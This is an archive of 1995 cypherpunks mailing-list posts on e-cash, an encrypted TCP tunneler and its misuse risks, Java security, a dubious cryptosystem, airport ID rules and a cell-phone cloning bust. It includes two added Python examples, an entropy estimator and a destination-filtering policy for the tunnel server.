Mondex keeps their protocols confidential.  Not so good to establish
trust in the system.

I also heard _rumours_, that several things went wrong in their
current field-test.  Reminds me that I should go after these rumors.

Additionally several banks begin to establish their own e-cash
systems.  E.g. in Germany from 1st January 1997 on nearly every
bank-customer will have an electronic-purse.


The main problem with e-cash proposed by Chaum et al. is that current
SmartCards are not powerful enough to handle the needed computation in
a timely fashion.

In the purse proposed by the German banks you have a simple counter on
your SmartCard.  With this system you _must_ have identification of
payer and payee to clear malfunctions or frauds by either party.


Bye!

Michael Deindl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 21 Oct 95 15:18:21 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Encrypted TCP Tunneler
Message-ID: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I am writing a program called Encrypted TCP Tunneler, which I hope to
finish in a month or so.  It will allow a secure link to be set up between
an ETT client and an ETT server, using Diffie-Hellman and DSA for
authenticated key exchange, and Blowfish for encryption.  A user will be
able to open a TCP connection to the client and have that connection
transparently tunnel across the secure link to a TCP address on the other
side. 

I see several uses for this program, such as secure telnet, secure web 
access, and access to a secure network across an insecure network.  I 
realize the program will not be as useful when IPv6 becomes widely 
available, but that may not happen for a while.  Also, this program can 
be used on top of IP security to give users (as opposed to system admins) 
more control over their own security.

Please send comments and suggestions.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 21 Oct 95 15:49:50 PDT
To: Thomas Grant Edwards <kelso@netcom.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510212249.PAA22804@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM 10/19/95 -0400, Thomas Grant Edwards wrote:
>This would require the remailer to examine entropy of messages passing 
>through.  Anything not random enough gets tossed.


A simple entropy measuring algorithm:

Generate N random pointers into a file. (or extract N random short 
strings from the file)

Sort them into order of the strings,

Find the number of bits in common between one string and the 
next string.  Total up S, the number of bits in common

Calculate (N * lg N)/S

For an encrypted file, this quantity should be close to unity, because 
the order in an encrypted file should not be easily detectable.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com
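
The estimator described in the post above, written out as an added example; it is not code from the original message. The sample count, the 8-byte string width, the constructed plaintext and the SHA-256 keystream used as a stand-in cipher are all assumptions made for illustration.

```python
import hashlib
import math
import random


def common_prefix_bits(a: bytes, b: bytes) -> int:
    """Number of leading bits two equal-length byte strings have in common."""
    bits = 0
    for x, y in zip(a, b):
        diff = x ^ y
        if diff:
            # Leading zero bits of the XOR are the bits still shared.
            return bits + (8 - diff.bit_length())
        bits += 8
    return bits


def order_ratio(data: bytes, n: int = 1024, width: int = 8, seed: int = 0) -> float:
    """Compute (N * lg N) / S as described in the post.

    N distinct random offsets are drawn, the width-byte strings found there
    are sorted, and S is the total number of leading bits shared by
    neighbouring strings in sorted order.
    """
    span = len(data) - width + 1
    if span < n:
        raise ValueError("input too short for n distinct pointers")
    rng = random.Random(seed)
    strings = sorted(data[p:p + width] for p in rng.sample(range(span), n))
    s = sum(common_prefix_bits(a, b) for a, b in zip(strings, strings[1:]))
    if s == 0:
        return math.inf
    return n * math.log2(n) / s


def constructed_plaintext(length: int, seed: int = 1) -> bytes:
    """Constructed sample input: word salad from a small vocabulary."""
    words = [b"the", b"remailer", b"message", b"entropy", b"of", b"random",
             b"enough", b"gets", b"tossed", b"anything", b"passing", b"through"]
    rng = random.Random(seed)
    out = bytearray()
    while len(out) < length:
        out += rng.choice(words) + b" "
    return bytes(out[:length])


def keystream_xor(data: bytes, key: bytes) -> bytes:
    """Stand-in for 'an encrypted file': XOR with a SHA-256 counter keystream.

    This only produces random-looking test input for the estimator.
    """
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        out += bytes(d ^ p for d, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def looks_random(data: bytes, threshold: float = 0.9) -> bool:
    """Remailer-style filter: keep only input whose ratio is near unity.

    The threshold is an assumed cut-off; random input scores a little
    above 1 because sorted neighbours share slightly fewer than lg N bits.
    """
    return order_ratio(data) >= threshold


if __name__ == "__main__":
    plain = constructed_plaintext(65536)
    cipher = keystream_xor(plain, b"constructed key")
    print("plaintext ratio: %.2f" % order_ratio(plain))
    print("keystream-xored ratio: %.2f" % order_ratio(cipher))
```

Compressed data also scores near unity on this measure, so a high ratio shows only that no order was detected, not that the input is encrypted.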





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Sat, 21 Oct 95 15:43:18 PDT
To: cypherpunks@toad.com
Subject: Re: digital cash and identity disclosure
Message-ID: <v03003702acaf1df73553@[198.93.25.66]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:20 21.10.95, Adam Shostack wrote:

>Michael Froomkin wrote:
>
>| i would like to propose the following radical idea:  Chaumian digicash is
>| a nice curiosity.  The future in the medium term (10+ years) for better
>| or worse belongs to Mondex.
>
>       Deploying hardware is VERY expensive.

Expense of deployment for this type of scheme does not seem to be a
consideration for banks; they stand to make a ton of money as a result.
There are areas where banks will resist spending money on new hardware,
but smart-card stuff isn't one of them.

> 30m internet users at $100 (half hardware, half tech support) is 3
> billion dollars to deploy today.  Secure commerce on the internet would
> drive that 30m figure (which will probably double this year anyway) way
> up.

Adding hardware to a personal computer to read from and write to smart
cards will cost money, but the majority of bank customers will not be
interested in Internet-based transactions for quite some time. So while
the potential market of Internet consumer financial transactors seems
large, it is dwarfed by the sum total of bank customers who are likely
to wind up with some form of non-pilot smart card-based payment system
within the next 2 years.

I've been told that a PCMCIA card that reads smart cards would cost around
$30ish; I've not had the time to follow this claim up, so it could be
off by a bit. Assuming it's accurate, the price doesn't present a
significant hurdle to the typical PC-based consumer. And if there is
enough demand, I'm sure that smart card readers will find their way
into desktop and laptop machines over time. For example, Catapult's
XBAND modem for Genesis and SNES has an ISO smart-card reader/writer in
it; such a consumer device's manufacturing cost is sensitive to even a
few pennies, so it can't've cost much to put it in there.

I consider it much likelier that non-Internet specific payment systems
will adapt to the Net, instead of Net-specific payment schemes seeing
broad deployment. To clarify: I consider CyberCash and FV to be
Net-adaptations of conventional schemes, rather than brand new payment
systems.

> Digicash doesn't need observer cards, which gives them a huge advantage.
>  If they ever sign with a real bank.

There is a US law called the Bank Secrecy Act that defines the
responsibilities of banks with regard to audit trails, record keeping,
and disclosure of financial transaction information. After talking to
quite a few people both in the regulatory and business realms recently,
I am convinced that truly anonymous e-cash simply isn't going to happen in
the US. And the US is going to have considerable influence on how
things go in the rest of the world; whether this is a good thing or not
is, unfortunately, an unrelated and purely philosophical debating
point.

Based on my knowledge of the backing behind Mondex at this relatively
early stage in the game, I am inclined to agree with Michael.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 21 Oct 95 18:03:58 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
Message-ID: <199510220102.SAA12922@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai <weidai@eskimo.com> writes:

>I am writing a program called Encrypted TCP Tunneler, which I hope to
>finish in a month or so.  It will allow a secure link to be set up between
>an ETT client and an ETT server, using Diffie-Hellman and DSA for
>authenticated key exchange, and Blowfish for encryption.  A user will be
>able to open a TCP connection to the client and have that connection
>transparently tunnel across the secure link to a TCP address on the other
>side. 

This has a lot of potential uses.  It would be good if chaining were
possible, although that requires the client to double-encrypt.  That way
it can let people connect out without local snoopers seeing where they
are connecting.  However for this to work it is necessary that the DNS
lookup be done by the server rather than the client, and for the
destination (to which the server is supposed to connect) to be passed
encrypted.

I should mention by the way that I don't share the general pessimism
towards anonymous TCP/IP connections.  While truly strong anonymity
against a hugely powerful opponent is difficult, I think a system like
what Wei is describing would still provide important privacy protections
as more people get hooked into the net.

It should be noted that SOCKS V5 has basically the functionality that Wei
is describing, but I am not sure whether any implementations exist.  It
also has some other features which might not be appropriate for
this use.  The purpose of SOCKS is to tunnel through firewalls.

>I see several uses for this program, such as secure telnet, secure web 
>access, and access to a secure network across an insecure network.  I 
>realize the program will not be as useful when IPv6 becomes widely 
>available, but that may not happen for a while.  Also, this program can 
>be used on top of IP security to give users (as opposed to system admins) 
>more control over their own security.

Unfortunately there is also a huge misuse of this program, as a
connection laundry for breakin attempts.  Hackers already go through
layer after layer of broken accounts, etc. to make tracebacks
difficult.  Read Stoll's "Cuckoo's Egg" for one account.  I think the
Mitnick story is similar.  These packet laundries would be extremely
inviting for this purpose.  The first time the ETT server is the base
of a lot of breakin attempts to military installations there is going
to be trouble.  SOCKS provides a config file for servers to limit what
kinds of connections will be allowed, but it is hard to see how to
filter out the bad guys while letting people go through who are
using services for which they are authorized.

Even if you don't try to provide anonymity with this service I think it
is still going to be a problem if breakins come from the server.  By
the time the traceback is initiated it is going to be a pain to figure
out where the connection was coming from.  The service would be similar
in this context to providing free guest accounts to which you could
telnet in and then telnet out.  I think any site which did this (some
used to in the relaxed old days) would take a lot of heat today.

I was toying with a limited form of this idea earlier, where outgoing
connections would be limited to http servers.  These are usually on a
small number of ports, although there are exceptions.  At least it
would be possible to filter out telnet and rlogin and such for that
application.  I don't think there are too many bad things you can do
just by connecting to httpd ports (probably I would be surprised,
though...).  But doing that would not make as much sense for the ETT
application.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 19:03:30 PDT
To: cypherpunks@toad.com
Subject: experimental socks5 gateway
Message-ID: <199510220158.SAA20609@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	so I've installed a socks5 server on infinity.c2.org, port
1080. Socks5 is available from
coast.cs.purdue.edu:/pub/tools/unix/socks

	This is for experimental purposes only. Full logs are kept.
It may go down at any time. It may not work. Your computer might blow
up. etc. etc.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Sat, 21 Oct 95 19:19:38 PDT
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <v02110101acaf51651ef9@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


Pardon the flame but I really have just about heard enough of this BS...

>This response came from Sun to Risks:
>
>> Date: Mon, 16 Oct 1995 21:22:40 -0700
>> From: Caveh.Jalali@eng.sun.com (Caveh Jalali)
>> Subject: Re: Risks in Java
>>
>> If we are going to "analyze" java security, let's keep in mind that there is
>> an important distinction between the language (java) and the machinery which
>> runs the java program.
>>
>> Java is a general-purpose programming language along the lines of C/C++.
>> So, there is no doubt that its expressive power overwhelms our
>> theoretician's abilities to predict java-programs behavior -- this is where
>> we start getting into the halting problem, computability and other black
>> magic.  Basically, i don't think we can "trust" programs written in any
>> *useful* programming language.
>
>Read: We can't trust Java programs.
>
>> The area where we can (must) build trust is the computing base.
>> Traditionally, this has been the OS, but in the case of java, it is the java
>> interpreter (such as netscape 2.0 and hotjava).  The browser is now the TCB
>> (trusted computer base) for all practical purposes...
>
>Read: The Java interpreter is supposed to be a TCB
>
>> And, to address the specific concern about applets spamming the net -- from
>> what I've seen, applets are only allowed to connect to the server that
>> supplied the applet in the first place (by default).  The worst thing one
>> could probably pull off is to spam oneself.
>
>Read: By default only - also note, none of this invalidates attacks 30-49
>from the previously posted list.
>
>Who here truly believes that the implementations of Java meet the
>requirements of a TCB?
>
>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236


Dr. Fred, you seem to spend a lot of energy slamming Java and HotJava. Are
you unaware that the HotJava Platform is the first generation pass at an
inline extensible GUI harness. Underline the total concept "extensible GUI
harness". This includes a series of tool functions to *help* perform secure
messaging (like those supplied in Netscape 2.0/Java), but because of the
enormity of the task and the number of facets on the face of this gem it
will be some time before the final versions of the first generation will be
available.

No one else had been working on this piece of technology before SMCC
started their effort. From the word floating about the SMCC labs they
didn't even know what they had.

So rather than slamming them, SMCC, or their PR folks for

   - releasing a version of a development tool far beyond what the "big boy's

   - doing what PR people do - Minimize and Maximize concepts in the press


I hope that you understand my point? The net/net is that OLTP needs to be
scalable to be a saleable commodity and without the ability to do
"java-ish" like local applets... There is no clean way to do this,
***period***. Also that OLTP requires transport level security, transaction
level security, and a whole lot of systems security and authentication. The
browser is the harness not the complete tool suite at this juncture.


As an aside - What blows my mind is the number of cycles people spend
bitching and moaning about Java itself rather than working to create a
better solution.

I just want to say "Get a clue. Moan about something that is important and
pertinent to the technologies at hand".


These comments are my own -

Sincerely,
Todd Glassey
todd@lgt.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ibg@oro.net
Date: Sat, 21 Oct 95 19:43:55 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510220242.TAA09079@oro.net>
MIME-Version: 1.0
Content-Type: text/plain


Very interesting article on offshore banking. Can you suggest a reading list or 
source of additional information?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Sat, 21 Oct 95 17:21:46 PDT
To: cypherpunks@toad.com
Subject: Re: "power one time pad"
In-Reply-To: <3087F1A2@mailer2>
Message-ID: <Pine.LNX.3.91.951021200919.452A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Oct 1995, Paul Koning 1695 wrote:

> 
> I'd be interested in reactions to the article in Network World, 10/16/95 
> issue,
> page 53.  It describes a supposed cryptosystem that sounds bogus, but
> I can't make up my mind about how much is the system and how much is
> the confusion of the author.
I have heard a lot about the Elementrix POTP encryption algorithm.  I remain
skeptical of this algorithm until the source code is released.
 
> Among other things, it says that POTP "doesn't use an encryption algorithm;
> instead it synchronizes random processes on two computers as they
> communicate".  (I wonder if the author understands that that's just another
> way to describe encryption algorithms...)  
I don't believe this is an error caused by the author's ignorance of 
encryption.  I remember hearing the same exact thing about POTP "not using an
encryption algorithm" from one of the Elementrix spokespeople.

> The other claim is that it 
> eliminates
> the need to manage keys.  "... there is no need for central servers where 
> PGP
> keys ... are kept".
> 
> This seems like a strange claim because of course PGP doesn't require
> central servers, but more importantly, you can't do authentication without
> at least one piece of keying data being established out of band.  That
> could be a certification authority public key, but you need something
> to get started.
> 
> Supposedly this thing was shown at Interop.  Did anyone see it, and does
> the product make sense even if the article didn't?

I downloaded the secure email client for windoze and it seemed to make sense.
I might have misunderstood the documentation but it says that it has to
establish a "secure channel" with the other person by reciprocating emails with
what I would guess to be key synchronization data.  FYI, this client is  
available from the Elementrix FTP site at ftp.elementrix.com.
----------------------------------------------------------------
`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key 1024-bit: 0xF9B22BA5
Fingerprint: BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Sat, 21 Oct 95 17:26:50 PDT
To: sameer <sameer@c2.org>
Subject: Re: bernstein results?
In-Reply-To: <199510211856.LAA25175@infinity.c2.org>
Message-ID: <Pine.3.89.9510212005.B13024-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 21 Oct 1995, sameer wrote:

> 	So when do we find out what the judge had to say about the
> hearing on Friday?
> 


It's probably going to be continued. Civil suits involving the government
take six months just to engage - that is schedule them and get all the
preliminary motions out of the way. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 20:54:59 PDT
To: mark@lochard.com.au (Mark)
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220058.AA44534@junkers.lochard.com.au>
Message-ID: <199510220349.UAA04621@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	alpha.c2.org will soon start providing anonymous web page
services.  You can get normal webserver access (the alpha.c2.org web
pages will be very limited) through an anonymous shell account.

> 
> >I was toying with a limited form of this idea earlier, where outgoing
> >connections would be limited to http servers.  These are usually on a
> >small number of ports, although there are exceptions.  At least it
> >would be possible to filter out telnet and rlogin and such for that
> >application.  I don't think there are too many bad things you can do
> >just by connecting to httpd ports (probably I would be surprised,
> >though...).  But doing that would not make as much sense for the ETT
> >application.
> 
> A more cypherpunky type of application would be to enable anonymous
> httpd's so that your clients could advertise their nice/naughty products
> and be safe from location identification. If they had to pack up then
> they could move to another ISP and reconnect to the anon.net as normal.
> (Didn't I just read this in a spam HOWTO?)
> 
> The problem I see is when a LEA gets involved and snoops your wires and
> traces you back to your starting point and then traces the client that is
> supplying nasty httpd services. You wouldn't necessarily be aware of this
> occurring either.
> 
> Mark
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Sat, 21 Oct 95 15:08:46 PDT
To: cypherpunks@toad.com
Subject: big bust
Message-ID: <9510212202.AA27572@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Feds Bust Huge Cell Phone "Cloning" Ring
NEW YORK, NEW YORK, U.S.A., 1995 OCT 20 (NB) -- New York officials have
cracked what they call "the biggest illegal cellular telephone cloning
operation in the country" with the arrest of three individuals this week. If
convicted the suspects could receive up to 15 years in state prison.

"Cloning" is the process of retrieving the electronic serial numbers (ESNs)
of legitimate phones off the airwaves and programming the purloined numbers
into stolen phones. Thieves capture the numbers using special scanners placed
near busy highways and airports. ESNs can also be obtained from stolen
phones.

Denver-based Secret Service agent Bill Bresnahan told Newsbytes the Secret
Service is tasked with investigating cellular phone fraud. Bresnahan says
investigative techniques include monitoring cell activity for an unusually
high number of long distance calls, and the use of direction finding
equipment to track down the illicit phones while they are in operation.

US West spokesperson Wendy Carver-Herbert and Bresnahan say there are some
steps that cell phone users can employ to help foil phone theft or catch
thieves. They encourage cell phone users to step up the physical security
they provide their phones. "If you are going to leave your car with a parking
attendant or parked on the street for several days, remove the handset and
the antenna to avoid drawing attention," says Carver-Herbert. She also
recommends activating the electronic lock when you are away from the phone.

They also recommend monitoring your cell phone bill closely. If you see calls
you are sure you didn't place, contact your service provider immediately, and
if your phone is stolen the company can block calls from that number. US West
Cellular has programmed its computers to watch for anomalies in each
customer's calling pattern as another way to foil this high tech crime, and
the company employs security personnel to contact customers when calls fall
outside the normal pattern.

The New York raid seized cloning software, 46 cell phones and various
equipment including computers officials said contained legitimate cell phone
access numbers which when programmed into cloned phones allows the purchaser
to illegally use cellular service without paying. They often make expensive
long distance calls to other parts of the world.

Officials said as many as 27,000 phones have been cloned over the last seven
months and at least 3,000 usable legitimate access numbers were stored in the
computers seized in the raid. Authorities estimate losses from the latest
scam may have cost phone companies as much as $27 million. Cell phone service
providers lose an estimated $1.5 million a day nationwide because of phone
cloning. Authorities said it costs a thief about $50 to get a stolen cell
phone activated with a cloned number. The phone can then be sold on the
street for about $100.

The Manhattan District Attorney, Robert Morgenthau, was particularly
interested in this case. He said his own phone has been cloned twice by
thieves recently. The first time the bill exceeded $3,000 and the second time
more than $5,000 in calls were charged to his number. The legitimate holder
of the cell phone number that is cloned isn't aware the phone has been cloned
until the bill arrives.

In an attempt to stop losses cell service provider Bell Atlantic NYNEX Mobile
(NYSE: NYN) recently introduced the use of personal identification numbers,
which the company said has cut phone fraud by an estimated 80 percent. The
user punches in the unique PIN and presses the send button on the phone after
dialing the desired number. Authorities say the cellular phone industry
spends $5 million annually to stop sophisticated cellular phone fraud.

(Jim Mallory/19951020/Press contact: Kim Ancin, 914-365-7573, or Jim Gerace,
914-365-7712, both of NYNEX)
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 21 Oct 95 19:05:45 PDT
To: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Subject: Re: airport security
In-Reply-To: <951019071622.2000cf@mitlns.mit.edu>
Message-ID: <Pine.SV4.3.91.951021220213.17237G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Why should airplane crashes be more of a cause for disseminating the 
Surveillance State than Greyhound Bus crashes?

I'd be more sympathetic to arguments about an airline's right to write 
its contracts as it pleases. Though they are Common Carriers; they can't 
just offer Contracts of Adhesion at will.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 21:53:33 PDT
To: cypherpunks@toad.com
Subject: Reducing the Flames, Attacks, and Nit-Pickings
Message-ID: <acaf19a6520210049105@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:18 AM 10/22/95, Todd Glassey wrote:

>As an aside - What blows my mind is the number of cycles people spend
>bitching and moaning about Java itself rather than working to create a
>better solution.


The recent flames and attacks are pretty typical of mailing lists,
especially mailing lists having 1200 highly-opinionated subscribers
(gulp!). Not that I like the flames, but they're not the problem I want to
really talk about.

A trend that bothers me--and others too, from comments here--is the intense
"feeding frenzy" that is going on with each and every new product, from
Netscape, to Microsoft Network, to Java, to Digicash.

Don't get me wrong--finding flaws is a useful thing to do. But this list is
becoming _consumed_ by the _process_ of attacking products. Worse, many of
the attacks are by innuendo, by rumors and speculations about what features
a product has.

My comments will likely vanish without a trace, but I urge folks to hold
back a bit on jumping in with attacks and reports of problems. Be sure
something is _really_ a flaw before sounding the alarms.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 22:04:47 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <acaf1d35530210046717@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:05 AM 10/22/95, Alan Horowitz wrote:
>Why should airplane crashes be more of a cause for disseminating the
>Surveillance State than Greyhound Bus crashes?
>
>I'd be more sympathetic to arguments about an airline's right to write
>its contracts as it pleases. Though they are Common Carriers; they can't
>just offer Contracts of Adhesion at will.

No crypto relevance--my apologies.

I am skeptical that the "all passengers must have picture IDs" has much to
do with identifying corpses after crashes.

The recent push is certainly associated with the various terrorist threats
and incidents. The FAA can push for it, and the airlines have little to say
about it.

However, I read--probably in the WSJ--that the airlines see this as a
chance to regain control of "ticket abuse." Corporations often have bought
up discount tickets without knowing who will be travelling and on what
dates. This allows them to have a pool of tickets and saves them a bunch of
money.

Reports are that many people showed up at boarding gates with a different
name than what the ticket said, and had to pay extra to get a current
ticket (no advance purchase, of course).

I'm not sure what the compelling lessons are, except that the
"Identification Required State" is getting closer every day.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 22 Oct 95 00:29:35 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220102.SAA12922@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951021233638.2645A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Oct 1995, Hal wrote:

> This has a lot of potential uses.  It would be good if chaining were
> possible, although that requires the client to double-encrypt.  That way
> it can let people connect out without local snoopers seeing where they
> are connecting.  However for this to work it is necessary that the DNS
> lookup be done by the server rather than the client, and for the
> destination (to which the server is supposed to connect) to be passed
> encrypted.

Thanks for the suggestions.  These features have already been implemented.
WRT to anonymity, I plan to add link encryption after releasing the first 
version.

> It should be noted that SOCKS V5 has basically the functionality that Wei
> is describing, but I am not sure whether any implementations exist.  It
> also has some other features which might not be appropriate for
> this use.  The purpose of SOCKS is to tunnel through firewalls.

I believe that using SOCKS requires changes to the application.  This 
will not be necessary with ETT, although as a price the user will have to 
do more work.  It may be possible to write a SOCKS to ETT adapter program.

> Unfortunately there is also a huge misuse of this program, as a
> connection laundry for breakin attempts.  Hackers already go through
> layer after layer of broken accounts, etc. to make tracebacks
> difficult.  Read Stoll's "Cuckoo's Egg" for one account.  I think the
> Mitnick story is similar.  These packet laundries would be extremely
> inviting for this purpose.  The first time the ETT server is the base
> of a lot of breakin attempts to military installations there is going
> to be trouble.  SOCKS provides a config file for servers to limit what
> kinds of connections will be allowed, but it is hard to see how to
> filter out the bad guys while letting people go through who are
> using services for which they are authorized.

ETT will allow the server to filter based on both the client's public key 
and the destination address.  I'm not sure how to implement this yet, but 
I hope to come up with a filtering scheme that will be general enough to 
be useful for many applications.

> Even if you don't try to provide anonymity with this service I think it
> is still going to be a problem if breakins come from the server.  By
> the time the traceback is initiated it is going to be a pain to figure
> out where the connection was coming from.  The service would be similar
> in this context to providing free guest accounts to which you could
> telnet in and then telnet out.  I think any site which did this (some
> used to in the relaxed old days) would take a lot of heat today.

I completely agree with you.  I don't think there will be many free 
publicly accessible ETT servers, because of the above reasons.  Most ETT
servers will probably be operated for private purposes.  Those that are 
not should either charge money to cover their expenses and risk, or allow 
connections to only a small range of addresses or ports.

Wei Dai
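
One way the server-side filter discussed above (client public key plus destination address, with the server doing the DNS lookup) could be structured. This is an added example, not ETT code: the rule syntax, the SHA-256 key fingerprint, and all names, keys and addresses are assumptions constructed for illustration.

```python
import hashlib
import ipaddress
from dataclasses import dataclass


def fingerprint(pubkey: bytes) -> str:
    """Short identifier for a client public key (assumed scheme: SHA-256, 16 hex chars)."""
    return hashlib.sha256(pubkey).hexdigest()[:16]


# Constructed sample keys; a real server would take these from the key exchange.
ALICE_FP = fingerprint(b"constructed-public-key-alice")
BOB_FP = fingerprint(b"constructed-public-key-bob")

# Hypothetical policy syntax, one rule per line, first match wins:
#   <allow|deny> <key fingerprint|*> <CIDR network> <port|lo-hi|*>
SAMPLE_POLICY = f"""
# constructed sample rules
deny  *           10.0.0.0/8        *          # never relay into the internal net
allow {ALICE_FP}  192.0.2.0/24      80
allow {ALICE_FP}  198.51.100.7/32   6000-6010
allow *           203.0.113.0/24    80         # open to any authenticated key
"""


@dataclass(frozen=True)
class Rule:
    allow: bool
    key: str        # client key fingerprint, or "*" for any client
    net: object     # ipaddress.IPv4Network or IPv6Network
    ports: range


def parse_policy(text: str) -> list:
    """Parse the policy text into an ordered rule list, rejecting malformed lines."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) != 4 or fields[0] not in ("allow", "deny"):
            raise ValueError(f"line {lineno}: malformed rule {raw!r}")
        action, key, net, ports = fields
        if ports == "*":
            port_range = range(0, 65536)
        else:
            lo, _, hi = ports.partition("-")
            lo, hi = int(lo), int(hi or lo)
            if not 0 < lo <= hi <= 65535:
                raise ValueError(f"line {lineno}: bad port range {ports!r}")
            port_range = range(lo, hi + 1)
        rules.append(Rule(action == "allow", key.lower(),
                          ipaddress.ip_network(net), port_range))
    return rules


def decide(rules, client_fp: str, dest_ip: str, dest_port: int) -> bool:
    """First matching rule wins; anything unmatched is denied."""
    addr = ipaddress.ip_address(dest_ip)
    for rule in rules:
        if rule.key not in ("*", client_fp.lower()):
            continue
        if addr in rule.net and dest_port in rule.ports:
            return rule.allow
    return False


def pick_destination(rules, client_fp: str, resolved_addrs, dest_port: int):
    """Filter on what the server's own DNS lookup returned, not on the name.

    Every resolved address must pass, so a name that also maps to a
    forbidden address is refused. The caller connects to the returned
    address directly instead of resolving the name a second time.
    """
    if not resolved_addrs:
        return None
    if all(decide(rules, client_fp, a, dest_port) for a in resolved_addrs):
        return resolved_addrs[0]
    return None


RULES = parse_policy(SAMPLE_POLICY)

if __name__ == "__main__":
    for fp, ip, port in [(ALICE_FP, "192.0.2.10", 80), (BOB_FP, "192.0.2.10", 80),
                         (ALICE_FP, "10.1.2.3", 80), (BOB_FP, "203.0.113.5", 80)]:
        print(fp, ip, port, "allow" if decide(RULES, fp, ip, port) else "deny")
```

Logging each decision together with the client fingerprint would also give the operator something to work from when a traceback request arrives.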






